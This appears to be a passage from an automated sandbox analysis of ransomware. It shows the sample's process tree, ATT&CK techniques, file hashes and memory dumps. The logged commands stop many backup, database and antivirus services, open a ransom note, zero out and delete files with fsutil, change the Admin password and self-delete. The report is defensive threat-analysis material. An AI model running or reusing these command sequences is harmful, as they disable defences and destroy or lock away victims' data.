"net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
2⤵
PID:576

C:\Windows\SysWOW64\net.exe
"net.exe" stop FA_Scheduler /y
2⤵
PID:5116

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2012 /y
2⤵
PID:1232

C:\Windows\SysWOW64\net.exe
"net.exe" stop SDRSVC /y
2⤵
PID:5072

C:\Windows\SysWOW64\net.exe
"net.exe" stop EsgShKernel /y
2⤵
PID:196

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPSAMA /y
2⤵
PID:3760

C:\Windows\SysWOW64\net.exe
"net.exe" stop ntrtscan /y
2⤵
PID:204

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPUpdateService /y
2⤵
PID:4928

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$TPS /y
2⤵
PID:2624

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
2⤵
PID:4936

C:\Windows\SysWOW64\net.exe
"net.exe" stop EPSecurityService /y
2⤵
PID:4804

C:\Windows\SysWOW64\net.exe
"net.exe" stop MSSQL$VEEAMSQL2008R2 /y
2⤵
PID:4568

C:\Windows\SysWOW64\net.exe
"net.exe" stop YooBackup /y
2⤵
PID:4560

C:\Windows\SysWOW64\net.exe
"net.exe" stop QBCFMonitorService /y
2⤵
PID:4500

C:\Windows\SysWOW64\notepad.exe
"C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_RECOVER_YOUR_FILES.txt
2⤵
- Opens file in notepad (likely ransom note)
PID:8660

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
2⤵
PID:11764

C:\Windows\SysWOW64\PING.EXE
ping 127.0.0.7 -n 3
3⤵
- Runs ping.exe
PID:14376

C:\Windows\SysWOW64\fsutil.exe
fsutil file setZeroData offset=0 length=524288 “%s”
3⤵
PID:9736

C:\Windows\SysWOW64\net.exe
"net.exe" user Admin NSFWNSFW123!
2⤵
PID:14908

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user Admin NSFWNSFW123!
3⤵
PID:14068

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\444.exe
2⤵
PID:14756

C:\Windows\SysWOW64\choice.exe
choice /C Y /N /D Y /T 3
3⤵
PID:14080

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:7640

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:7632

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
1⤵
PID:9804

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VSNAPVSS /y
1⤵
PID:9792

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSRS /y
1⤵
PID:10224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
1⤵
PID:10216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
1⤵
PID:10260

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ntrtscan /y
1⤵
PID:1956

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EsgShKernel /y
1⤵
PID:5396

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
1⤵
PID:7484

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
1⤵
PID:6820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:4712

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
1⤵
PID:11256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
1⤵
PID:11248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPSecurityService /y
1⤵
PID:11240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y
1⤵
PID:11232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
1⤵
PID:11224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
1⤵
PID:11216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:11208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
1⤵
PID:11200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
1⤵
PID:11188

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
1⤵
PID:11172

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPS /y
1⤵
PID:11876

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:11868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:11860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
1⤵
PID:11852

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
1⤵
PID:11844

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
1⤵
PID:11836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$TPSAMA /y
1⤵
PID:11828

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
1⤵
PID:11820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
1⤵
PID:11812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EPUpdateService /y
1⤵
PID:11804

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ARSM /y
1⤵
PID:11796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
1⤵
PID:11784

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y
1⤵
PID:11776

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer110 /y
1⤵
PID:11768

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
1⤵
PID:11760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
1⤵
PID:12660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
1⤵
PID:13348

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Web Control Service” /y
1⤵
PID:13340

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:13332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Message Router” /y
1⤵
PID:13324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “aphidmonitorservice” /y
1⤵
PID:13316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
1⤵
PID:12504

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop UI0Detect /y
1⤵
PID:12476

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msftesql$PROD /y
1⤵
PID:12416

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophos /y
1⤵
PID:12408

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Enterprise Client Service” /y
1⤵
PID:12384

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:12344

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
1⤵
PID:12336

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop veeam /y
1⤵
PID:10644

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
1⤵
PID:12256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQL Backups /y
1⤵
PID:12992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
1⤵
PID:12976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
1⤵
PID:12968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
1⤵
PID:13820

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:13812

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
1⤵
PID:13804

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:12304

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeSA /y
1⤵
PID:12376

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
1⤵
PID:12368

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Clean Service” /y
1⤵
PID:12432

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
1⤵
PID:12452

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
1⤵
PID:12484

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeadtopology /y
1⤵
PID:12512

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
1⤵
PID:11316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
1⤵
PID:14332

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
1⤵
PID:14324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
1⤵
PID:14316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
1⤵
PID:14308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
1⤵
PID:14300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
1⤵
PID:14292

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
1⤵
PID:14284

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop W3Svc /y
1⤵
PID:14276

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
1⤵
PID:14268

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:14480

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeES /y
1⤵
PID:14472

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:4972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:9616

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
1⤵
PID:12536

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
1⤵
PID:12320

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop IISAdmin /y
1⤵
PID:12580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos AutoUpdate Service” /y
1⤵
PID:5632

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBIDPService /y
1⤵
PID:15384

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
1⤵
PID:3956

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
1⤵
PID:4764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
1⤵
PID:3324

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
1⤵
PID:8484

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
1⤵
PID:15732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:15724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
1⤵
PID:15632

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:15624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
1⤵
PID:4428

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
1⤵
PID:688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
1⤵
PID:2628

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
1⤵
PID:3012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
1⤵
PID:8460

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
1⤵
PID:8436

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
1⤵
PID:10748

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
1⤵
PID:4588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
1⤵
PID:4788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:15352

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
1⤵
PID:14976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
1⤵
PID:14608

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
1⤵
PID:14600

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeIS /y
1⤵
PID:14536

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPS /y
1⤵
PID:14528

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
1⤵
PID:14520

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SMTPSvc /y
1⤵
PID:14512

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
1⤵
PID:14504

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:14496

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
1⤵
PID:14488

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
1⤵
PID:12248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
1⤵
PID:12280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SstpSvc /y
1⤵
PID:14260

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:14252

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:14244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
1⤵
PID:14236

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer /y
1⤵
PID:14228

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
1⤵
PID:14220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “SQLsafe Filter Service” /y
1⤵
PID:14212

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:14204

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SamSs /y
1⤵
PID:14196

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop PDVFSService /y
1⤵
PID:14188

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
1⤵
PID:14180

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
1⤵
PID:14040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
1⤵
PID:14032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EraserSvc11710 /y
1⤵
PID:14020

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CAARCUpdateSvc /y
1⤵
PID:14012

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
1⤵
PID:14004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:13996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
1⤵
PID:13988

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:13980

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecJobEngine /y
1⤵
PID:13972

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer /y
1⤵
PID:13964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:13956

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:13948

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop NetMsmqActivator /y
1⤵
PID:13940

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop unistoresvc_1af40a /y
1⤵
PID:13932

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
1⤵
PID:13868

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
1⤵
PID:13860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
1⤵
PID:13852

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop audioendpointbuilder /y
1⤵
PID:13844

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y
1⤵
PID:13796

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
1⤵
PID:13788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PROD /y
1⤵
PID:13780

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y
1⤵
PID:13772

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
1⤵
PID:13764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
1⤵
PID:13756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
1⤵
PID:13748

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:13740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
1⤵
PID:13728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AVP /y
1⤵
PID:13720

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMGMT /y
1⤵
PID:13712

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
1⤵
PID:13692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop CASAD2DWebSvc /y
1⤵
PID:13684

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Antivirus /y
1⤵
PID:13676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:13668

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:13660

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:13652

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
1⤵
PID:12960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MsDtsServer100 /y
1⤵
PID:12952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$TPS /y
1⤵
PID:12944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
1⤵
PID:12936

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
1⤵
PID:12928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop msexchangeimap4 /y
1⤵
PID:12920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
1⤵
PID:12912

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
1⤵
PID:12896

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
1⤵
PID:12888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
1⤵
PID:12004

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop POP3Svc /y
1⤵
PID:11752

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
1⤵
PID:11740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
1⤵
PID:11732

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
1⤵
PID:11724

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
1⤵
PID:11716

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Symantec System Recovery” /y
1⤵
PID:11708

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:11700

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSExchangeMTA /y
1⤵
PID:11676

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Health Service” /y
1⤵
PID:11568

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:11444

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos MCS Client” /y
1⤵
PID:11428

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
1⤵
PID:11312

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
1⤵
PID:11296

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y
1⤵
PID:11280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
1⤵
PID:11164

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop stc_raw_agent /y
1⤵
PID:10816

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop DCAgent /y
1⤵
PID:10788

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
1⤵
PID:10780

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
1⤵
PID:10764

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
1⤵
PID:10756

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
1⤵
PID:10740

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
1⤵
PID:10244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop “Sophos Agent” /y
1⤵
PID:4680

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
1⤵
PID:9964

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecVSSProvider /y
1⤵
PID:9876

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
1⤵
PID:9860

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
1⤵
PID:9848

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:9836

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop YooBackup /y
1⤵
PID:5092

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBCFMonitorService /y
1⤵
PID:5048

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Winlogon Helper DLL

1

T1004

Privilege Escalation

Defense Evasion

Virtualization/Sandbox Evasion

1

T1497

File Permissions Modification

1

T1222

Modify Registry

3

T1112

Credential Access

Discovery

Query Registry

2

T1012

Virtualization/Sandbox Evasion

1

T1497

System Information Discovery

3

T1082

Remote System Discovery

1

T1018

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\HOW_TO_RECOVER_YOUR_FILES.txt
MD5
54d784a0a30bafedb8c1ab6755114837

SHA1
e47de8405a284aa5934bd55e10e94bbc5a2e1d62

SHA256
b4470eedbc5e0284fa0a3adecfac59e7023a92dc288290afaae77ce0fee70952

SHA512
217a4bbde4265bf456dd49d5400c8ea113b97cdef3f8953429d8ff8ca9ed2ac219cf66336f78f605bfce51963491f467ac4ab511747865977611ecebe0005075

Download Submit
C:\Users\Admin\AppData\Local\Temp\i1c0fyki.exe
MD5
17a2564bda8ec94004266e90ae620937

SHA1
84910b1d8c306f4b4b2eacbd74c3e13d37768130

SHA256
f9788ca182b0754299da35e1619675df74b431814b67241854f8b30fc563d0fa

SHA512
d1be86d15424dbc2963509a9b0d812d026336d15333840697dce782427bfd4fae2a73b24940532786cf603c1df96faa95d14dd5ec34bc1558f591e0c5ff38ddb

Download Submit
C:\Users\Admin\Desktop\HOW_TO_RECOVER_YOUR_FILES.txt
MD5
87e6be1a6be997a2e425c1f876d21873

SHA1
18085a3a826253a5d86b69e4b026f3374af54414

SHA256
e2c3ea96f805a27cbe8ad17f3d068a80fdcf86daa234cc85080434a9e29ec949

SHA512
c7a892c1e19ccb302e6f57c8eedec5e1c482dbff384e80592cec69039c0b1ce35dab58fb1031a0128d26123752bf82117c1cd7f98759c0c9f19ff246831442fb

Download Submit
memory/188-24-0x0000000000000000-mapping.dmp

Download
memory/212-11-0x0000000000000000-mapping.dmp

Download
memory/504-10-0x0000000000000000-mapping.dmp

Download
memory/648-62-0x0000000000000000-mapping.dmp

Download
memory/736-66-0x0000000000000000-mapping.dmp

Download
memory/748-20-0x0000000000000000-mapping.dmp

Download
memory/800-16-0x0000000000000000-mapping.dmp

Download
memory/896-22-0x0000000005FF0000-0x0000000005FF1000-memory.dmp

Filesize
4KB

Download
memory/896-7-0x0000000005AC0000-0x0000000005AC1000-memory.dmp

Filesize
4KB

Download
memory/896-3-0x0000000077814000-0x0000000077815000-memory.dmp

Filesize
4KB

Download
memory/896-4-0x00000000739E0000-0x00000000740CE000-memory.dmp

Filesize
6.9MB

Download
memory/896-5-0x0000000001240000-0x0000000001241000-memory.dmp

Filesize
4KB

Download
memory/896-8-0x0000000006500000-0x0000000006501000-memory.dmp

Filesize
4KB

Download
memory/896-89-0x0000000007ED0000-0x0000000007ED1000-memory.dmp

Filesize
4KB

Download
memory/1152-67-0x0000000000000000-mapping.dmp

Download
memory/1336-28-0x0000000000000000-mapping.dmp

Download
memory/1344-14-0x0000000000000000-mapping.dmp

Download
memory/1824-69-0x0000000000000000-mapping.dmp

Download
memory/2092-25-0x0000000000000000-mapping.dmp

Download
memory/2132-15-0x0000000000000000-mapping.dmp

Download
memory/2180-12-0x0000000000000000-mapping.dmp

Download
memory/2480-61-0x0000000000000000-mapping.dmp

Download
memory/3128-9-0x0000000000000000-mapping.dmp

Download
memory/3144-21-0x0000000000000000-mapping.dmp

Download
memory/3412-26-0x0000000000000000-mapping.dmp

Download
memory/3512-13-0x0000000000000000-mapping.dmp

Download
memory/3804-18-0x0000000000000000-mapping.dmp

Download
